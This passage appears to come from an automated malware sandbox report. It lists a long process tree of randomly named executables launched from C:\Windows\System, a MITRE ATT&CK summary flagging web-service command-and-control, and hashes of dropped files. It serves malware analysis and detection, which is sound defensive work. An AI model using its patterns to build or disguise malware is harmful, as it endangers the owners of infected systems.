  C:\Windows\System\DmExTJC.exe
  2⤵
  PID:8272
- C:\Windows\System\mitCUFu.exe
  C:\Windows\System\mitCUFu.exe
  2⤵
  PID:8332
- C:\Windows\System\OpqoRLy.exe
  C:\Windows\System\OpqoRLy.exe
  2⤵
  PID:8380
- C:\Windows\System\LovSPfD.exe
  C:\Windows\System\LovSPfD.exe
  2⤵
  PID:8424
- C:\Windows\System\SrFMRYK.exe
  C:\Windows\System\SrFMRYK.exe
  2⤵
  PID:8444
- C:\Windows\System\XVSwZEq.exe
  C:\Windows\System\XVSwZEq.exe
  2⤵
  PID:8496
- C:\Windows\System\TfRPSIX.exe
  C:\Windows\System\TfRPSIX.exe
  2⤵
  PID:8652
- C:\Windows\System\iWlAMUz.exe
  C:\Windows\System\iWlAMUz.exe
  2⤵
  PID:8616
- C:\Windows\System\rADxhib.exe
  C:\Windows\System\rADxhib.exe
  2⤵
  PID:8676
- C:\Windows\System\xhdYvXE.exe
  C:\Windows\System\xhdYvXE.exe
  2⤵
  PID:8752
- C:\Windows\System\JXMUSCh.exe
  C:\Windows\System\JXMUSCh.exe
  2⤵
  PID:8872
- C:\Windows\System\yrGdcdr.exe
  C:\Windows\System\yrGdcdr.exe
  2⤵
  PID:8896
- C:\Windows\System\javmdNq.exe
  C:\Windows\System\javmdNq.exe
  2⤵
  PID:8960
- C:\Windows\System\lmqnsZu.exe
  C:\Windows\System\lmqnsZu.exe
  2⤵
  PID:9008
- C:\Windows\System\XRsfRvY.exe
  C:\Windows\System\XRsfRvY.exe
  2⤵
  PID:9072
- C:\Windows\System\dAPfOYf.exe
  C:\Windows\System\dAPfOYf.exe
  2⤵
  PID:9116
- C:\Windows\System\BUAGJXA.exe
  C:\Windows\System\BUAGJXA.exe
  2⤵
  PID:8240
- C:\Windows\System\POhTLCv.exe
  C:\Windows\System\POhTLCv.exe
  2⤵
  PID:8256
- C:\Windows\System\LgrWquF.exe
  C:\Windows\System\LgrWquF.exe
  2⤵
  PID:8292
- C:\Windows\System\EbDQDLk.exe
  C:\Windows\System\EbDQDLk.exe
  2⤵
  PID:8476
- C:\Windows\System\QcUaDsr.exe
  C:\Windows\System\QcUaDsr.exe
  2⤵
  PID:8528
- C:\Windows\System\lUhdfFs.exe
  C:\Windows\System\lUhdfFs.exe
  2⤵
  PID:8740
- C:\Windows\System\kCJpPLc.exe
  C:\Windows\System\kCJpPLc.exe
  2⤵
  PID:8824
- C:\Windows\System\lAqrdIJ.exe
  C:\Windows\System\lAqrdIJ.exe
  2⤵
  PID:8368
- C:\Windows\System\ldueOeK.exe
  C:\Windows\System\ldueOeK.exe
  2⤵
  PID:8480
- C:\Windows\System\iCkBvBS.exe
  C:\Windows\System\iCkBvBS.exe
  2⤵
  PID:8692
- C:\Windows\System\YhUSlGl.exe
  C:\Windows\System\YhUSlGl.exe
  2⤵
  PID:9120
- C:\Windows\System\ncjuDgL.exe
  C:\Windows\System\ncjuDgL.exe
  2⤵
  PID:8716
- C:\Windows\System\AzMODav.exe
  C:\Windows\System\AzMODav.exe
  2⤵
  PID:9244
- C:\Windows\System\WoEeCkS.exe
  C:\Windows\System\WoEeCkS.exe
  2⤵
  PID:9296
- C:\Windows\System\ofPXjwK.exe
  C:\Windows\System\ofPXjwK.exe
  2⤵
  PID:9320
- C:\Windows\System\uqFogmP.exe
  C:\Windows\System\uqFogmP.exe
  2⤵
  PID:9336
- C:\Windows\System\SKcnIJN.exe
  C:\Windows\System\SKcnIJN.exe
  2⤵
  PID:9356
- C:\Windows\System\NNDRrUt.exe
  C:\Windows\System\NNDRrUt.exe
  2⤵
  PID:9396
- C:\Windows\System\KHFtbzT.exe
  C:\Windows\System\KHFtbzT.exe
  2⤵
  PID:9440
- C:\Windows\System\lGHHVTH.exe
  C:\Windows\System\lGHHVTH.exe
  2⤵
  PID:9480
- C:\Windows\System\BNuHmWu.exe
  C:\Windows\System\BNuHmWu.exe
  2⤵
  PID:9496
- C:\Windows\System\JHCRaSN.exe
  C:\Windows\System\JHCRaSN.exe
  2⤵
  PID:9536
- C:\Windows\System\dIMCseA.exe
  C:\Windows\System\dIMCseA.exe
  2⤵
  PID:9556
- C:\Windows\System\HTHaScZ.exe
  C:\Windows\System\HTHaScZ.exe
  2⤵
  PID:9584
- C:\Windows\System\MHUDDLM.exe
  C:\Windows\System\MHUDDLM.exe
  2⤵
  PID:9608
- C:\Windows\System\ysrbnXB.exe
  C:\Windows\System\ysrbnXB.exe
  2⤵
  PID:9628
- C:\Windows\System\RPVYakX.exe
  C:\Windows\System\RPVYakX.exe
  2⤵
  PID:9648
- C:\Windows\System\QkSWnrF.exe
  C:\Windows\System\QkSWnrF.exe
  2⤵
  PID:9672
- C:\Windows\System\uCSzeIg.exe
  C:\Windows\System\uCSzeIg.exe
  2⤵
  PID:9688
- C:\Windows\System\SFWPMiP.exe
  C:\Windows\System\SFWPMiP.exe
  2⤵
  PID:9740
- C:\Windows\System\RtuosKh.exe
  C:\Windows\System\RtuosKh.exe
  2⤵
  PID:9764
- C:\Windows\System\olgidEU.exe
  C:\Windows\System\olgidEU.exe
  2⤵
  PID:9804
- C:\Windows\System\MFvLnhp.exe
  C:\Windows\System\MFvLnhp.exe
  2⤵
  PID:9836
- C:\Windows\System\IqfSRTL.exe
  C:\Windows\System\IqfSRTL.exe
  2⤵
  PID:9856
- C:\Windows\System\HyHDKum.exe
  C:\Windows\System\HyHDKum.exe
  2⤵
  PID:9884
- C:\Windows\System\WhUAuUW.exe
  C:\Windows\System\WhUAuUW.exe
  2⤵
  PID:9944
- C:\Windows\System\oTgpUGC.exe
  C:\Windows\System\oTgpUGC.exe
  2⤵
  PID:9964
- C:\Windows\System\xdVODqX.exe
  C:\Windows\System\xdVODqX.exe
  2⤵
  PID:9980
- C:\Windows\System\sPcashw.exe
  C:\Windows\System\sPcashw.exe
  2⤵
  PID:10028
- C:\Windows\System\YzuQvDt.exe
  C:\Windows\System\YzuQvDt.exe
  2⤵
  PID:10048
- C:\Windows\System\JxWzcMK.exe
  C:\Windows\System\JxWzcMK.exe
  2⤵
  PID:10072
- C:\Windows\System\TTbZcEp.exe
  C:\Windows\System\TTbZcEp.exe
  2⤵
  PID:10112
- C:\Windows\System\XBTmxgx.exe
  C:\Windows\System\XBTmxgx.exe
  2⤵
  PID:10132
- C:\Windows\System\KVGpcrI.exe
  C:\Windows\System\KVGpcrI.exe
  2⤵
  PID:10156
- C:\Windows\System\CqKSUkA.exe
  C:\Windows\System\CqKSUkA.exe
  2⤵
  PID:10176
- C:\Windows\System\RpFRZnn.exe
  C:\Windows\System\RpFRZnn.exe
  2⤵
  PID:10204
- C:\Windows\System\rpneYBK.exe
  C:\Windows\System\rpneYBK.exe
  2⤵
  PID:10228
- C:\Windows\System\vmMyeWO.exe
  C:\Windows\System\vmMyeWO.exe
  2⤵
  PID:8460
- C:\Windows\System\BwdjTgQ.exe
  C:\Windows\System\BwdjTgQ.exe
  2⤵
  PID:9288
- C:\Windows\System\rnfiMDm.exe
  C:\Windows\System\rnfiMDm.exe
  2⤵
  PID:9392
- C:\Windows\System\ORxiovP.exe
  C:\Windows\System\ORxiovP.exe
  2⤵
  PID:9436
- C:\Windows\System\ObuglsF.exe
  C:\Windows\System\ObuglsF.exe
  2⤵
  PID:9492
- C:\Windows\System\tJWzoZY.exe
  C:\Windows\System\tJWzoZY.exe
  2⤵
  PID:9528
- C:\Windows\System\ArUMmTM.exe
  C:\Windows\System\ArUMmTM.exe
  2⤵
  PID:9576
- C:\Windows\System\tBBcSHq.exe
  C:\Windows\System\tBBcSHq.exe
  2⤵
  PID:8772
- C:\Windows\System\nGYndQV.exe
  C:\Windows\System\nGYndQV.exe
  2⤵
  PID:9680
- C:\Windows\System\PhGEesN.exe
  C:\Windows\System\PhGEesN.exe
  2⤵
  PID:9756
- C:\Windows\System\wUStpMv.exe
  C:\Windows\System\wUStpMv.exe
  2⤵
  PID:9800
- C:\Windows\System\FGBvBeY.exe
  C:\Windows\System\FGBvBeY.exe
  2⤵
  PID:9864
- C:\Windows\System\PlkWmNQ.exe
  C:\Windows\System\PlkWmNQ.exe
  2⤵
  PID:9972
- C:\Windows\System\cWlXkvU.exe
  C:\Windows\System\cWlXkvU.exe
  2⤵
  PID:10064
- C:\Windows\System\gflZILh.exe
  C:\Windows\System\gflZILh.exe
  2⤵
  PID:10092
- C:\Windows\System\oIoqKMW.exe
  C:\Windows\System\oIoqKMW.exe
  2⤵
  PID:10216
- C:\Windows\System\iEBLBgS.exe
  C:\Windows\System\iEBLBgS.exe
  2⤵
  PID:8800
- C:\Windows\System\aOQTdrr.exe
  C:\Windows\System\aOQTdrr.exe
  2⤵
  PID:9348
- C:\Windows\System\dfzyFZa.exe
  C:\Windows\System\dfzyFZa.exe
  2⤵
  PID:9460
- C:\Windows\System\WPLTneV.exe
  C:\Windows\System\WPLTneV.exe
  2⤵
  PID:9592
- C:\Windows\System\MdbFlgz.exe
  C:\Windows\System\MdbFlgz.exe
  2⤵
  PID:9624
- C:\Windows\System\JlQPEQn.exe
  C:\Windows\System\JlQPEQn.exe
  2⤵
  PID:9852
- C:\Windows\System\wxVrkIP.exe
  C:\Windows\System\wxVrkIP.exe
  2⤵
  PID:10088
- C:\Windows\System\PGOYmBr.exe
  C:\Windows\System\PGOYmBr.exe
  2⤵
  PID:9312
- C:\Windows\System\UGAUfnQ.exe
  C:\Windows\System\UGAUfnQ.exe
  2⤵
  PID:9532
- C:\Windows\System\jaTxxBh.exe
  C:\Windows\System\jaTxxBh.exe
  2⤵
  PID:9792
- C:\Windows\System\GGLRFEB.exe
  C:\Windows\System\GGLRFEB.exe
  2⤵
  PID:9640
- C:\Windows\System\ojEbWlF.exe
  C:\Windows\System\ojEbWlF.exe
  2⤵
  PID:10256
- C:\Windows\System\JMBlQLY.exe
  C:\Windows\System\JMBlQLY.exe
  2⤵
  PID:10276
- C:\Windows\System\RCpbNco.exe
  C:\Windows\System\RCpbNco.exe
  2⤵
  PID:10292
- C:\Windows\System\gOOVaUH.exe
  C:\Windows\System\gOOVaUH.exe
  2⤵
  PID:10324
- C:\Windows\System\xHayuaH.exe
  C:\Windows\System\xHayuaH.exe
  2⤵
  PID:10352
- C:\Windows\System\ciIInLj.exe
  C:\Windows\System\ciIInLj.exe
  2⤵
  PID:10384
- C:\Windows\System\eFnstSO.exe
  C:\Windows\System\eFnstSO.exe
  2⤵
  PID:10400
- C:\Windows\System\hIPxSys.exe
  C:\Windows\System\hIPxSys.exe
  2⤵
  PID:10440
- C:\Windows\System\jsHDclI.exe
  C:\Windows\System\jsHDclI.exe
  2⤵
  PID:10488
- C:\Windows\System\ABfwpNk.exe
  C:\Windows\System\ABfwpNk.exe
  2⤵
  PID:10508
- C:\Windows\System\XrYhKPS.exe
  C:\Windows\System\XrYhKPS.exe
  2⤵
  PID:10532
- C:\Windows\System\XtOgQrK.exe
  C:\Windows\System\XtOgQrK.exe
  2⤵
  PID:10572
- C:\Windows\System\mVYVoUw.exe
  C:\Windows\System\mVYVoUw.exe
  2⤵
  PID:10592
- C:\Windows\System\ClluaYX.exe
  C:\Windows\System\ClluaYX.exe
  2⤵
  PID:10616
- C:\Windows\System\zKusBBK.exe
  C:\Windows\System\zKusBBK.exe
  2⤵
  PID:10632
- C:\Windows\System\afeWbid.exe
  C:\Windows\System\afeWbid.exe
  2⤵
  PID:10652
- C:\Windows\System\tBSFLwk.exe
  C:\Windows\System\tBSFLwk.exe
  2⤵
  PID:10688
- C:\Windows\System\gpfEZSX.exe
  C:\Windows\System\gpfEZSX.exe
  2⤵
  PID:10720
- C:\Windows\System\ZAyioNa.exe
  C:\Windows\System\ZAyioNa.exe
  2⤵
  PID:10768
- C:\Windows\System\ztGncNX.exe
  C:\Windows\System\ztGncNX.exe
  2⤵
  PID:10792
- C:\Windows\System\DFnaHIm.exe
  C:\Windows\System\DFnaHIm.exe
  2⤵
  PID:10820
- C:\Windows\System\NIfRNZt.exe
  C:\Windows\System\NIfRNZt.exe
  2⤵
  PID:10840
- C:\Windows\System\Sncmwmu.exe
  C:\Windows\System\Sncmwmu.exe
  2⤵
  PID:10860
- C:\Windows\System\LEUqSkx.exe
  C:\Windows\System\LEUqSkx.exe
  2⤵
  PID:10888
- C:\Windows\System\ljJNGxO.exe
  C:\Windows\System\ljJNGxO.exe
  2⤵
  PID:10908
- C:\Windows\System\jcOgmOI.exe
  C:\Windows\System\jcOgmOI.exe
  2⤵
  PID:10928
- C:\Windows\System\ucdgGvD.exe
  C:\Windows\System\ucdgGvD.exe
  2⤵
  PID:10972
- C:\Windows\System\pzTEunw.exe
  C:\Windows\System\pzTEunw.exe
  2⤵
  PID:10992
- C:\Windows\System\hKsHHCc.exe
  C:\Windows\System\hKsHHCc.exe
  2⤵
  PID:11032
- C:\Windows\System\NGeAMND.exe
  C:\Windows\System\NGeAMND.exe
  2⤵
  PID:11056
- C:\Windows\System\BFnMzTy.exe
  C:\Windows\System\BFnMzTy.exe
  2⤵
  PID:11084
- C:\Windows\System\XrGfTXF.exe
  C:\Windows\System\XrGfTXF.exe
  2⤵
  PID:11124
- C:\Windows\System\aCQdMUL.exe
  C:\Windows\System\aCQdMUL.exe
  2⤵
  PID:11152
- C:\Windows\System\ftkJZRh.exe
  C:\Windows\System\ftkJZRh.exe
  2⤵
  PID:11176
- C:\Windows\System\RnaIVeY.exe
  C:\Windows\System\RnaIVeY.exe
  2⤵
  PID:11216
- C:\Windows\System\OtPdqul.exe
  C:\Windows\System\OtPdqul.exe
  2⤵
  PID:11236
- C:\Windows\System\RGUlNNJ.exe
  C:\Windows\System\RGUlNNJ.exe
  2⤵
  PID:9388
- C:\Windows\System\gSghWdr.exe
  C:\Windows\System\gSghWdr.exe
  2⤵
  PID:10268
- C:\Windows\System\OUyrznL.exe
  C:\Windows\System\OUyrznL.exe
  2⤵
  PID:10348
- C:\Windows\System\ZfGKiDE.exe
  C:\Windows\System\ZfGKiDE.exe
  2⤵
  PID:10376
- C:\Windows\System\CblNYQA.exe
  C:\Windows\System\CblNYQA.exe
  2⤵
  PID:10484
- C:\Windows\System\WkvgXIF.exe
  C:\Windows\System\WkvgXIF.exe
  2⤵
  PID:10528
- C:\Windows\System\cHIfBAl.exe
  C:\Windows\System\cHIfBAl.exe
  2⤵
  PID:10584
- C:\Windows\System\zuZSGuU.exe
  C:\Windows\System\zuZSGuU.exe
  2⤵
  PID:10628
- C:\Windows\System\hElQyGb.exe
  C:\Windows\System\hElQyGb.exe
  2⤵
  PID:10728
- C:\Windows\System\niJXFLC.exe
  C:\Windows\System\niJXFLC.exe
  2⤵
  PID:10780
- C:\Windows\System\cPHrsCA.exe
  C:\Windows\System\cPHrsCA.exe
  2⤵
  PID:10852
- C:\Windows\System\wDVSOIp.exe
  C:\Windows\System\wDVSOIp.exe
  2⤵
  PID:10924
- C:\Windows\System\pEYCDeu.exe
  C:\Windows\System\pEYCDeu.exe
  2⤵
  PID:11016
- C:\Windows\System\itkBose.exe
  C:\Windows\System\itkBose.exe
  2⤵
  PID:11052
- C:\Windows\System\ptzeVrR.exe
  C:\Windows\System\ptzeVrR.exe
  2⤵
  PID:11116
- C:\Windows\System\NGkzrqy.exe
  C:\Windows\System\NGkzrqy.exe
  2⤵
  PID:11212
- C:\Windows\System\rQzTiIB.exe
  C:\Windows\System\rQzTiIB.exe
  2⤵
  PID:11260
- C:\Windows\System\rfHwGRh.exe
  C:\Windows\System\rfHwGRh.exe
  2⤵
  PID:9524
- C:\Windows\System\URyZdmi.exe
  C:\Windows\System\URyZdmi.exe
  2⤵
  PID:10464
- C:\Windows\System\Tfeymxk.exe
  C:\Windows\System\Tfeymxk.exe
  2⤵
  PID:10684
- C:\Windows\System\uafZaMV.exe
  C:\Windows\System\uafZaMV.exe
  2⤵
  PID:10836
- C:\Windows\System\ayeQfwP.exe
  C:\Windows\System\ayeQfwP.exe
  2⤵
  PID:10984
- C:\Windows\System\fWeRvui.exe
  C:\Windows\System\fWeRvui.exe
  2⤵
  PID:11080
- C:\Windows\System\dkbkRzT.exe
  C:\Windows\System\dkbkRzT.exe
  2⤵
  PID:11160
- C:\Windows\System\bvKeBiv.exe
  C:\Windows\System\bvKeBiv.exe
  2⤵
  PID:10568
- C:\Windows\System\fcaNQcK.exe
  C:\Windows\System\fcaNQcK.exe
  2⤵
  PID:10752
- C:\Windows\System\fprnrzR.exe
  C:\Windows\System\fprnrzR.exe
  2⤵
  PID:11068
- C:\Windows\System\jGLftxe.exe
  C:\Windows\System\jGLftxe.exe
  2⤵
  PID:10252
- C:\Windows\System\vgGtaxR.exe
  C:\Windows\System\vgGtaxR.exe
  2⤵
  PID:11284
- C:\Windows\System\FyzxpBl.exe
  C:\Windows\System\FyzxpBl.exe
  2⤵
  PID:11316
- C:\Windows\System\jdIxUAU.exe
  C:\Windows\System\jdIxUAU.exe
  2⤵
  PID:11336
- C:\Windows\System\bhLlrLp.exe
  C:\Windows\System\bhLlrLp.exe
  2⤵
  PID:11356
- C:\Windows\System\QFFodFt.exe
  C:\Windows\System\QFFodFt.exe
  2⤵
  PID:11400
- C:\Windows\System\NCIhESy.exe
  C:\Windows\System\NCIhESy.exe
  2⤵
  PID:11416
- C:\Windows\System\YaCAPvg.exe
  C:\Windows\System\YaCAPvg.exe
  2⤵
  PID:11440
- C:\Windows\System\pisazlb.exe
  C:\Windows\System\pisazlb.exe
  2⤵
  PID:11468
- C:\Windows\System\ZkpCAJM.exe
  C:\Windows\System\ZkpCAJM.exe
  2⤵
  PID:11484
- C:\Windows\System\KveQlLG.exe
  C:\Windows\System\KveQlLG.exe
  2⤵
  PID:11560
- C:\Windows\System\GxXrdqN.exe
  C:\Windows\System\GxXrdqN.exe
  2⤵
  PID:11680
- C:\Windows\System\IaxysbR.exe
  C:\Windows\System\IaxysbR.exe
  2⤵
  PID:11696
- C:\Windows\System\NqrnoXF.exe
  C:\Windows\System\NqrnoXF.exe
  2⤵
  PID:11712
- C:\Windows\System\sywSphD.exe
  C:\Windows\System\sywSphD.exe
  2⤵
  PID:11728
- C:\Windows\System\nsSofOC.exe
  C:\Windows\System\nsSofOC.exe
  2⤵
  PID:11744
- C:\Windows\System\pSlJAmR.exe
  C:\Windows\System\pSlJAmR.exe
  2⤵
  PID:11760
- C:\Windows\System\CnhXaNz.exe
  C:\Windows\System\CnhXaNz.exe
  2⤵
  PID:11776
- C:\Windows\System\mbzMjJB.exe
  C:\Windows\System\mbzMjJB.exe
  2⤵
  PID:11792
- C:\Windows\System\ktIcwsO.exe
  C:\Windows\System\ktIcwsO.exe
  2⤵
  PID:11808
- C:\Windows\System\DjIxnXQ.exe
  C:\Windows\System\DjIxnXQ.exe
  2⤵
  PID:11824
- C:\Windows\System\cmMudbg.exe
  C:\Windows\System\cmMudbg.exe
  2⤵
  PID:11840
- C:\Windows\System\uLGsYEm.exe
  C:\Windows\System\uLGsYEm.exe
  2⤵
  PID:11856
- C:\Windows\System\tEUcKPI.exe
  C:\Windows\System\tEUcKPI.exe
  2⤵
  PID:11872
- C:\Windows\System\zeSidAK.exe
  C:\Windows\System\zeSidAK.exe
  2⤵
  PID:11896
- C:\Windows\System\joYzgWZ.exe
  C:\Windows\System\joYzgWZ.exe
  2⤵
  PID:11916
- C:\Windows\System\dtveeIW.exe
  C:\Windows\System\dtveeIW.exe
  2⤵
  PID:12052
- C:\Windows\System\AhXJmNU.exe
  C:\Windows\System\AhXJmNU.exe
  2⤵
  PID:12124
- C:\Windows\System\HirUtDz.exe
  C:\Windows\System\HirUtDz.exe
  2⤵
  PID:12148
- C:\Windows\System\QmUSCsM.exe
  C:\Windows\System\QmUSCsM.exe
  2⤵
  PID:12176
- C:\Windows\System\BGYGTEM.exe
  C:\Windows\System\BGYGTEM.exe
  2⤵
  PID:12212
- C:\Windows\System\oaTvyGD.exe
  C:\Windows\System\oaTvyGD.exe
  2⤵
  PID:12248
- C:\Windows\System\czbTgJx.exe
  C:\Windows\System\czbTgJx.exe
  2⤵
  PID:12276
- C:\Windows\System\pLWxYdw.exe
  C:\Windows\System\pLWxYdw.exe
  2⤵
  PID:10500
- C:\Windows\System\OVhjDrH.exe
  C:\Windows\System\OVhjDrH.exe
  2⤵
  PID:11112
- C:\Windows\System\BckeTxr.exe
  C:\Windows\System\BckeTxr.exe
  2⤵
  PID:11300
- C:\Windows\System\UTkHzlj.exe
  C:\Windows\System\UTkHzlj.exe
  2⤵
  PID:11448
- C:\Windows\System\xYtiaVN.exe
  C:\Windows\System\xYtiaVN.exe
  2⤵
  PID:11412
- C:\Windows\System\KVYkMcn.exe
  C:\Windows\System\KVYkMcn.exe
  2⤵
  PID:11480
- C:\Windows\System\ZWimHig.exe
  C:\Windows\System\ZWimHig.exe
  2⤵
  PID:11532
- C:\Windows\System\zfmoFxe.exe
  C:\Windows\System\zfmoFxe.exe
  2⤵
  PID:11576
- C:\Windows\System\uqGAjfH.exe
  C:\Windows\System\uqGAjfH.exe
  2⤵
  PID:11616
- C:\Windows\System\EmgURHF.exe
  C:\Windows\System\EmgURHF.exe
  2⤵
  PID:11668
- C:\Windows\System\jBkzxIW.exe
  C:\Windows\System\jBkzxIW.exe
  2⤵
  PID:11736
- C:\Windows\System\ZvdPcYd.exe
  C:\Windows\System\ZvdPcYd.exe
  2⤵
  PID:11784
- C:\Windows\System\jYzHSck.exe
  C:\Windows\System\jYzHSck.exe
  2⤵
  PID:11820
- C:\Windows\System\Mdfjfme.exe
  C:\Windows\System\Mdfjfme.exe
  2⤵
  PID:2104
- C:\Windows\System\kvYIJTY.exe
  C:\Windows\System\kvYIJTY.exe
  2⤵
  PID:11928
- C:\Windows\System\vpNnhcz.exe
  C:\Windows\System\vpNnhcz.exe
  2⤵
  PID:11988
- C:\Windows\System\WlXyTJo.exe
  C:\Windows\System\WlXyTJo.exe
  2⤵
  PID:1932
- C:\Windows\System\EmUKmTV.exe
  C:\Windows\System\EmUKmTV.exe
  2⤵
  PID:12116
- C:\Windows\System\WIPVccZ.exe
  C:\Windows\System\WIPVccZ.exe
  2⤵
  PID:12156
- C:\Windows\System\sbODDwX.exe
  C:\Windows\System\sbODDwX.exe
  2⤵
  PID:12228
- C:\Windows\System\BzyLXwG.exe
  C:\Windows\System\BzyLXwG.exe
  2⤵
  PID:11280
- C:\Windows\System\wJbRWMr.exe
  C:\Windows\System\wJbRWMr.exe
  2⤵
  PID:11476
- C:\Windows\System\JukfFwT.exe
  C:\Windows\System\JukfFwT.exe
  2⤵
  PID:11660
- C:\Windows\System\xyzOIIs.exe
  C:\Windows\System\xyzOIIs.exe
  2⤵
  PID:11636
- C:\Windows\System\CYUvPrD.exe
  C:\Windows\System\CYUvPrD.exe
  2⤵
  PID:11940
- C:\Windows\System\mHRutzs.exe
  C:\Windows\System\mHRutzs.exe
  2⤵
  PID:11892
- C:\Windows\System\ljQbkZp.exe
  C:\Windows\System\ljQbkZp.exe
  2⤵
  PID:4756
- C:\Windows\System\clVXmNU.exe
  C:\Windows\System\clVXmNU.exe
  2⤵
  PID:12172
- C:\Windows\System\iimacPg.exe
  C:\Windows\System\iimacPg.exe
  2⤵
  PID:12264
- C:\Windows\System\tFKjiez.exe
  C:\Windows\System\tFKjiez.exe
  2⤵
  PID:11620
- C:\Windows\System\BJesGOT.exe
  C:\Windows\System\BJesGOT.exe
  2⤵
  PID:12208
- C:\Windows\System\bFxMAfr.exe
  C:\Windows\System\bFxMAfr.exe
  2⤵
  PID:11328
- C:\Windows\System\KIJvbPQ.exe
  C:\Windows\System\KIJvbPQ.exe
  2⤵
  PID:4348
- C:\Windows\System\vaIlSTD.exe
  C:\Windows\System\vaIlSTD.exe
  2⤵
  PID:12296
- C:\Windows\System\MEQrSuf.exe
  C:\Windows\System\MEQrSuf.exe
  2⤵
  PID:12316
- C:\Windows\System\BaEZAas.exe
  C:\Windows\System\BaEZAas.exe
  2⤵
  PID:12340
- C:\Windows\System\BITAczg.exe
  C:\Windows\System\BITAczg.exe
  2⤵
  PID:12356
- C:\Windows\System\MtFaOnD.exe
  C:\Windows\System\MtFaOnD.exe
  2⤵
  PID:12376
- C:\Windows\System\IsnitoL.exe
  C:\Windows\System\IsnitoL.exe
  2⤵
  PID:12404
- C:\Windows\System\JTDkeFw.exe
  C:\Windows\System\JTDkeFw.exe
  2⤵
  PID:12420
- C:\Windows\System\LJpCRrX.exe
  C:\Windows\System\LJpCRrX.exe
  2⤵
  PID:12452
- C:\Windows\System\hqdnxtW.exe
  C:\Windows\System\hqdnxtW.exe
  2⤵
  PID:12476
- C:\Windows\System\hbHZVLr.exe
  C:\Windows\System\hbHZVLr.exe
  2⤵
  PID:12496
- C:\Windows\System\qPqevjs.exe
  C:\Windows\System\qPqevjs.exe
  2⤵
  PID:12524
- C:\Windows\System\GKBbwBQ.exe
  C:\Windows\System\GKBbwBQ.exe
  2⤵
  PID:12544
- C:\Windows\System\vDAzqvz.exe
  C:\Windows\System\vDAzqvz.exe
  2⤵
  PID:12588
- C:\Windows\System\uyvKAoP.exe
  C:\Windows\System\uyvKAoP.exe
  2⤵
  PID:12612
- C:\Windows\System\xlGFcDT.exe
  C:\Windows\System\xlGFcDT.exe
  2⤵
  PID:12632
- C:\Windows\System\uIVpnRK.exe
  C:\Windows\System\uIVpnRK.exe
  2⤵
  PID:12668
- C:\Windows\System\nnLHCMh.exe
  C:\Windows\System\nnLHCMh.exe
  2⤵
  PID:12724
- C:\Windows\System\PCmwWYK.exe
  C:\Windows\System\PCmwWYK.exe
  2⤵
  PID:12752
- C:\Windows\System\pqRvjMr.exe
  C:\Windows\System\pqRvjMr.exe
  2⤵
  PID:12772
- C:\Windows\System\uhgeMkT.exe
  C:\Windows\System\uhgeMkT.exe
  2⤵
  PID:12836
- C:\Windows\System\LpXrEEx.exe
  C:\Windows\System\LpXrEEx.exe
  2⤵
  PID:12856
- C:\Windows\System\DFztQvb.exe
  C:\Windows\System\DFztQvb.exe
  2⤵
  PID:12876
- C:\Windows\System\LMdLrFO.exe
  C:\Windows\System\LMdLrFO.exe
  2⤵
  PID:12896
- C:\Windows\System\FIESYgz.exe
  C:\Windows\System\FIESYgz.exe
  2⤵
  PID:12936
- C:\Windows\System\GkLjilW.exe
  C:\Windows\System\GkLjilW.exe
  2⤵
  PID:12956
- C:\Windows\System\OpGZImI.exe
  C:\Windows\System\OpGZImI.exe
  2⤵
  PID:13012
- C:\Windows\System\zULfEjq.exe
  C:\Windows\System\zULfEjq.exe
  2⤵
  PID:13040
- C:\Windows\System\qcXANBC.exe
  C:\Windows\System\qcXANBC.exe
  2⤵
  PID:13068
- C:\Windows\System\OBOYZFV.exe
  C:\Windows\System\OBOYZFV.exe
  2⤵
  PID:13088
- C:\Windows\System\BaZxcQd.exe
  C:\Windows\System\BaZxcQd.exe
  2⤵
  PID:13108
- C:\Windows\System\xatDMoP.exe
  C:\Windows\System\xatDMoP.exe
  2⤵
  PID:13148
- C:\Windows\System\dLJWfHF.exe
  C:\Windows\System\dLJWfHF.exe
  2⤵
  PID:13180
- C:\Windows\System\rEmvccC.exe
  C:\Windows\System\rEmvccC.exe
  2⤵
  PID:13216

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s0hzpi3h.m1k.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows\System\FDiBTqk.exe

Filesize
1.8MB

MD5
feded233694f6250bf59961c5d1ef9ee

SHA1
88c7b75b2d6e4bedc2cade8111a283a0ea1a6c23

SHA256
8a3d33c6ad5c54914760bc2045e97b7c01236a7465fe41ba2deef2b8b753e092

SHA512
7e40ee4dfed907abec29944d6a8af2d0fc32ec6a3774bc1bd43fecdc3dc330673a112f0711abec6043fc97b39c1ca375f3147e46fc0886638f3295598c8fbde1

Download Submit
C:\Windows\System\FYFrylG.exe

Filesize
1.8MB

MD5
7ab6512d051991f8d871435d18495a83

SHA1
e73b1baae3a0fa6eadcc4ebad49b5c21c75889a9

SHA256
c34b4885ff617a4fc02d26440afd6e47ae11889f23f0d33da3a6d5d66c6190d7

SHA512
51879ea7cc4037d010c437c465d7a4e43e4bbc5d818ea08680278d61efaafe1df8bddf21f6188dba08dde9b44b2f68b917ad1c09a0806cc09c1409a7c1528e29

Download Submit
C:\Windows\System\FYaNPIC.exe

Filesize
1.8MB

MD5
9b30998a8f7f43292d6786e4d00a0486

SHA1
11128f743f5c6489b76f3e66c1504b6de759448c

SHA256
6350517882438a27d60727629a703d96553eabf99feaaa34f8e15a6bdda511db

SHA512
b824c1b7381f92f89f138c44be129a8cbd293227639f6304860964a782b60e6b5798ab37006512cf080b280ec4823c6fad5947ee427a7839670837211a5a04b6

Download Submit
C:\Windows\System\HLJNNTp.exe

Filesize
1.8MB

MD5
b9457060753f20ada375706896015dec

SHA1
9a8acae3b2bc83817097c5f2bb9cc21d83ede3d0

SHA256
938be9ee02be7cd50b8953238739697a45865f3caaa2bebe13e0d26e1d763fc6

SHA512
b248f4d18ee8e29f93651ce8e87cbc3573821a5b1f85ceb0e46ec89578a153cc4f31eb275c334d1ee01d2c2fe4f35b2b29e9f5742dd1862f7d83a8fd9e76d4a3

Download Submit
